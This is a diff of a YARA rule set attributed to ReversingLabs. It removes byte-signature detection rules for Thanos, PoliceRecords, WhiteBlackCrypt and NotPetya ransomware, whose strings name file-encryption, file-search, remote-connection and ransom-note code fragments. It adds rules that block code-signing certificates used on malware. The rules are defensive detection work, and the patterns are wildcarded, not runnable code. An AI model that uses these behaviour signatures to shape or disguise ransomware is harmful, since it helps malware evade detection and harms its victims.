-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Thanos"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 01 2B ?? 16 00 13 ?? 11 ?? 2D ?? DD
-            ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 6C 7E ?? ?? ?? ??
-            28 ?? ?? ?? ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 35 ?? 7E ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08
-            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 2B ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 7E ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08
-            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 00 00 11
-            ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 11 ?? 14 FE 01 13 ?? 11 ?? 2D ?? 11
-            ?? 6F ?? ?? ?? ?? 00 DC 00 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38
-            ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0D 00 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D
-            ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ?? ?? 6F
-        }
-		$find_files_p2 = {
-            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 16 FE 01 2B ?? 16 00 13 ?? 11 ?? 2D ?? 38 ?? ?? ?? ?? 00 00 09 72 ?? ?? ??
-            ?? 17 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0C 00 00
-            08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ?? ?? ??
-            6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A
-        }
-		$find_files_p3 = {
-            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 00 6F
-            ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ??
-            ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 16 FE 01 2B ?? 16 00 13 ?? 11 ?? 2D ?? DD ?? ?? ?? ?? 08 6F ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 6C 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 23 ?? ??
-            ?? ?? ?? ?? ?? ?? 5A 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 35 ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08 6F ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 00 00 2B ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08 6F ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 00 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 00 00 11 ?? 6F ?? ?? ?? ?? 13 ??
-            11 ?? 3A ?? ?? ?? ?? DE ?? 11 ?? 14 FE 01 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 DC
-            00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 3A ??
-            ?? ?? ?? DE ?? 11 ?? 14 FE 01 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 00 00 DE ??
-            26 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 06 13 ?? 2B ?? 11 ?? 2A
-        }
-		$encrypt_files = {
-            73 ?? ?? ?? ?? 13 ?? 11 ?? 03 7D ?? ?? ?? ?? 11 ?? 04 7D ?? ?? ?? ?? 11 ?? 05 7D ?? ??
-            ?? ?? 11 ?? 0E ?? 7D ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 6F ?? ?? ?? ??
-            80 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2D ?? 00 28
-            ?? ?? ?? ?? 0A 06 8E 69 16 FE 02 16 FE 01 13 ?? 11 ?? 2D ?? 00 16 0B 2B ?? 00 06 07 9A
-            6F ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 06 07 9A 6F ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 06 07 9A 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
-            00 00 00 00 07 17 58 0B 07 06 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 00 2B ?? 00 16 0B 2B ??
-            00 7E ?? ?? ?? ?? 02 07 9A 6F ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 02 07 9A
-            6F ?? ?? ?? ?? 00 00 00 07 17 58 0B 07 02 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ??
-            ?? 72 ?? ?? ?? ?? 00 6F ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 00 6F ?? ?? ??
-            ?? 26 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 14 0D 73 ?? ?? ?? ?? 13
-            ?? 11 ?? 11 ?? 7D ?? ?? ?? ?? 11 ?? 12 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 00 7E ?? ?? ??
-            ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2D ?? 00 09 2D ?? 11 ?? FE 06 ??
-            ?? ?? ?? 73 ?? ?? ?? ?? 0D 2B ?? 09 73 ?? ?? ?? ?? 0C 08 1A 6F ?? ?? ?? ?? 00 08 16 6F
-            ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 00 2B ?? 00 11 ?? 7B ?? ?? ??
-            ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ??
-            28 ?? ?? ?? ?? 00 00 00 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE
-            16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 00 2A
-        }
-		$remote_connection = {
-            00 00 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 19 6F ?? ?? ?? ??
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 02 28 ?? ?? ?? ?? 06 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 06 28 ?? ?? ?? ?? 0C DE ?? 26 00 00 DE ?? 00 7E ??
-            ?? ?? ?? 0C 2B ?? 00 08 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRANS LTD" and ( pe.signatures [ i ] . serial == "00:83:32:0d:93:dd:8c:f1:6d:11:f9:9b:10:78:b0:a7:cb" or pe.signatures [ i ] . serial == "83:32:0d:93:dd:8c:f1:6d:11:f9:9b:10:78:b0:a7:cb" ) and 1524614400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Policerecords : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_10Bae1D20Cb4Cc36A0Ffac86 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects PoliceRecords ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bacd3f98-a069-58ca-8423-01fcef7d4062"
-		date = "2022-08-02"
-		modified = "2022-08-02"
+		id = "a07d1c35-0026-526a-bf08-e6b07008da03"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.PoliceRecords.yara#L1-L79"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13986-L14002"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "55cb1a5d030c47abb1a9ca9970fb19b3124128e409bc9515c173c33b2bb49a16"
+		logic_hash = "44e91fbf4da8e81859a21408ee9f1971f1e8f48d22553fcaa6469156d4a0670b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "PoliceRecords"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            00 72 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 06 6F ?? ?? ?? ?? 0C 04 0D 09 18 73 ?? ?? ??
-            ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 08 08 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ??
-            03 19 73 ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? D2 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ??
-            25 13 ?? 15 FE 01 16 FE 01 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ??
-            ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 2A
-        }
-		$find_files = {
-            11 ?? 11 ?? 9A 13 ?? 00 00 07 11 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            00 11 ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E
-            69 32 ?? 00 DE ?? 26 00 00 DE ?? 17 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 0C 16 13 ??
-            2B ?? 00 00 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 11 ?? 9A 28 ?? ?? ?? ?? 00
-            72 ?? ?? ?? ?? 08 11 ?? 9A 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ??
-            00 11 ?? 17 58 13 ?? 11 ?? 08 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 00 72 ?? ?? ?? ?? 1D 28
-            ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1D 28 ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 7E ?? ??
-            ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0D 09 72 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 1A 6F ?? ??
-            ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 16 8C
-            ?? ?? ?? ?? 1A 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11
-            ?? 72 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 1A 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 1A 6F ?? ?? ?? ?? 00 7E ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F
-            ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ??
-            72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 00 07 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ??
-            13 ?? 11 ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 26 2A
-        }
-		$desktop_kill_tick = {
-            02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 0B 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 09 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 13 ?? 07 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 07 28 ?? ?? ?? ?? 00
-            00 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 11 ?? 28 ?? ?? ?? ?? 00 00 02 7B ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 00 2A
-        }
-		$drop_ransom_note = {
-            00 16 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 00 07 72 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07
-            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 DE ?? 07 2C ??
-            07 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 26 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $desktop_kill_tick ) and ( $drop_ransom_note )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "10:ba:e1:d2:0c:b4:cc:36:a0:ff:ac:86" and 1476773830 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Whiteblackcrypt : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_230716Bfe915Dd6203B2E2A35674C2Ee : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects WhiteBlackCrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9855c10d-563d-54e0-bc79-945daef947de"
-		date = "2021-07-05"
-		modified = "2021-07-05"
+		id = "849c390e-f81f-558e-88a3-19242c127a56"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.WhiteBlackCrypt.yara#L1-L91"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14004-L14020"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "37b95cc3412f2f2d02d19c4c15b529c4f67453cb195627b5bab2f353e7602354"
+		logic_hash = "0197ff46ceb1017488da4383436fd0ddc375904f36cc16c5a8ef21d633ec387c"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "WhiteBlackCrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            41 57 41 56 41 55 41 54 55 57 56 53 48 83 EC ?? 4C 8D 3D ?? ?? ?? ?? 45 31 F6 49 89
-            CD E8 ?? ?? ?? ?? 48 85 C0 49 89 C4 0F 84 ?? ?? ?? ?? 4C 89 E1 E8 ?? ?? ?? ?? 48 85
-            C0 0F 84 ?? ?? ?? ?? 48 8D 68 ?? 4C 89 FA 48 89 E9 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D
-            15 ?? ?? ?? ?? 48 89 E9 E8 ?? ?? ?? ?? 85 C0 74 ?? 44 89 F0 48 83 C9 ?? 48 89 EF F2
-            AE 4C 89 EF 48 89 CB 48 83 C9 ?? F2 AE 48 F7 D3 48 F7 D1 01 D9 48 63 D9 48 89 D9 E8
-            ?? ?? ?? ?? 48 89 D9 4C 89 EA 48 89 C6 48 89 C7 44 89 F0 F3 AA 48 89 F1 E8 ?? ?? ??
-            ?? 48 8D 15 ?? ?? ?? ?? 48 89 F1 E8 ?? ?? ?? ?? 48 89 EA 48 89 F1 E8 ?? ?? ?? ?? 48
-            89 F1 E8 ?? ?? ?? ?? 48 89 F1 85 C0 74 ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 48 89
-            F1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 89 E1 48 83 C4 ?? 5B 5E 5F 5D 41 5C 41 5D 41 5E
-            41 5F E9 ?? ?? ?? ?? 48 83 C4 ?? 5B 5E 5F 5D 41 5C 41 5D 41 5E 41 5F C3
-        }
-		$encrypt_files = {
-            41 55 41 54 55 57 56 53 48 83 EC ?? 48 8D 15 ?? ?? ?? ?? 31 F6 4C 8D 2D ?? ?? ?? ??
-            48 89 CD E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C3 E8 ?? ?? ?? ?? 48 89 C7 49 89 D9 41
-            B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 F9 E8 ?? ?? ?? ?? 85 C0 49 89 C4 74 ?? 81 FE ??
-            ?? ?? ?? 7F ?? 45 89 E0 48 89 FA 4C 89 E9 E8 ?? ?? ?? ?? 45 31 C0 89 F2 48 89 D9 E8
-            ?? ?? ?? ?? 44 01 E6 4D 63 C4 48 89 F9 49 89 D9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 45 31
-            C0 89 F2 48 89 D9 E8 ?? ?? ?? ?? EB ?? 48 89 F9 48 89 EF E8 ?? ?? ?? ?? 48 89 D9 E8
-            ?? ?? ?? ?? 31 C0 48 83 C9 ?? F2 AE 48 89 CE 48 F7 D6 48 89 F1 48 83 C1 ?? E8 ?? ??
-            ?? ?? 48 89 EA 48 89 C1 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ??
-            48 89 E9 48 89 C2 48 83 C4 ?? 5B 5E 5F 5D 41 5C 41 5D E9
-        }
-		$register_service_p1 = {
-            57 56 53 48 81 EC ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 31 C0 41 B9 ?? ?? ?? ?? 48 8D 94
-            24 ?? ?? ?? ?? 48 89 CB B9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 D7 F3 AB 48 8D
-            44 24 ?? 48 89 54 24 ?? 48 C7 C1 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 15 ?? ?? ?? ?? 48
-            C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? ?? 48 8B 35 ?? ?? ??
-            ?? 0F 85 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 31 C9 41 B8 ?? ?? ?? ?? 48 89 DA FF 15
-            ?? ?? ?? ?? 48 8D 44 24 ?? 45 31 C0 41 B9 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 15 ?? ??
-            ?? ?? 48 C7 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8D 05 ?? ?? ?? ?? 48 8B
-            4C 24 ?? 41 B9 ?? ?? ?? ?? 45 31 C0 C7 44 24 ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48
-            89 44 24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
-            45 31 C0 48 89 D9 FF 15 ?? ?? ?? ?? 31 C0 E9 ?? ?? ?? ?? 31 C9 FF D6 48 85 C0 79 ??
-            B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 31 C9 BA ?? ??
-            ?? ?? 48 C1 E0 ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ??
-            ?? 48 8D 35 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
-            48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 48 8D
-        }
-		$register_service_p2 = {
-            8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7
-            84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            41 B9 ?? ?? ?? ?? 48 89 F2 48 89 1D ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 5C 24 ??
-            48 8B 35 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ??
-            ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF D6 B9 ?? ?? ?? ?? 48 89 C3 FF 15 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 48 89 D9 49 89 C0 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D
-            54 24 ?? 48 89 C1 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 41 B9 ?? ??
-            ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 89 5C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ??
-            ?? ?? ?? ?? 48 89 44 24 ?? 8B 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? 99 F7 F9 2D ?? ?? ?? ?? 89 44 24 ?? 8B 44 24 ?? 99 F7 F9 31 C9 48 8D 15 ?? ?? ??
-            ?? 2D ?? ?? ?? ?? 89 44 24 ?? FF D6 BA ?? ?? ?? ?? 48 89 D9 FF 15 ?? ?? ?? ?? 48 89
-            D9 FF 15 ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 8D 5C 24 ?? 45 31 C9 45 31 C0 31 D2 48
-            89 D9 FF D6 85 C0 74 ?? 48 89 D9 FF 15 ?? ?? ?? ?? 48 89 D9 FF 15 ?? ?? ?? ?? EB ??
-            8B 84 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5E 5F C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $register_service_p* ) ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jiang Liu" and pe.signatures [ i ] . serial == "23:07:16:bf:e9:15:dd:62:03:b2:e2:a3:56:74:c2:ee" and 1472169600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Notpetya : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_36A77D37E68E02Fd3D043C7197E044Ca : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects NotPetya ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ea655048-4ef7-5dd7-872e-f1c2e38234cf"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "721e48fb-3046-5b2d-8ad9-ae340e598794"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.NotPetya.yara#L1-L73"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14022-L14038"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "328f0e527fee2145879ee13c003d375db832f7f3eacf7a1eb303393c1c8b5a36"
+		logic_hash = "fc13ac5880cc2c8eac9ff8d09f6c5c2055b2de54d460a284936a4f6cd78192e8"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "NotPetya"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_file = {
